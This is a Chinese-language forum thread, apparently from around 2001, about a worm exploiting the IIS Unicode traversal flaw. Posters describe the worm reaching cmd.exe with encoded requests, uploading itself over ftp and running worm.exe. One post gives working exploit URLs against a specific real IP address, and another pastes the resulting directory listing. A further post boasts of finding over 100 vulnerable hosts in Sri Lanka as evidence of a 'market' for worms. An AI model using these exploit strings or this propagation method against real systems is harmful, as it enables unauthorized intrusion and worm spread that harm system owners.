yeah~~~你终于不头晕了这个蠕虫攻击存在UNICODE漏洞的IIS主机,运行过程(下文分解)

解决方案 »

  1.   

    话说上回说到蠕虫程序(这个蠕虫写成功后威力应该跟攻击linux的LION差不多,机理是一样的)给NT或者2K发送带有UNICODE编码的请求后能访问到cmd.exe然后利用这个cmd".exe?/c+ftp命令就把自己传到该主机上了
    然后发送一个....cmd".exe?/c+worm.exe的请求就在主机上运行蠕虫了
      

  2.   

    不要啊,我对unix一窍不通啊!!!!!
      

  3.   

    http://209.79.65.1/scripts/..%c1%pc../winnt/system32/cmd".exe?/c+dir
    在浏览器地址栏里输入上面一行然后回车------你看到了什么???
      

  4.   

    http://209.79.65.1/是美国鬼子的主机下面再输入http://209.79.65.1/scripts/..%c1%pc../winnt/system32/cmd".exe?/c+dir+c:
    你又看到了什么???
      

  5.   

    4740640 qq
    Directory of C:\Inetpub\scripts05/14/01  01:18a        <DIR>          .
    05/14/01  01:18a        <DIR>          ..
                   2 File(s)              0 bytes
                              1,442,894,336 bytes free
      

  6.   

    是啊,我3个小时在斯里兰卡扫描到100多台有这个UNICODE的漏洞主机、、、这样的不完全统计证明蠕虫的市场很大嘛!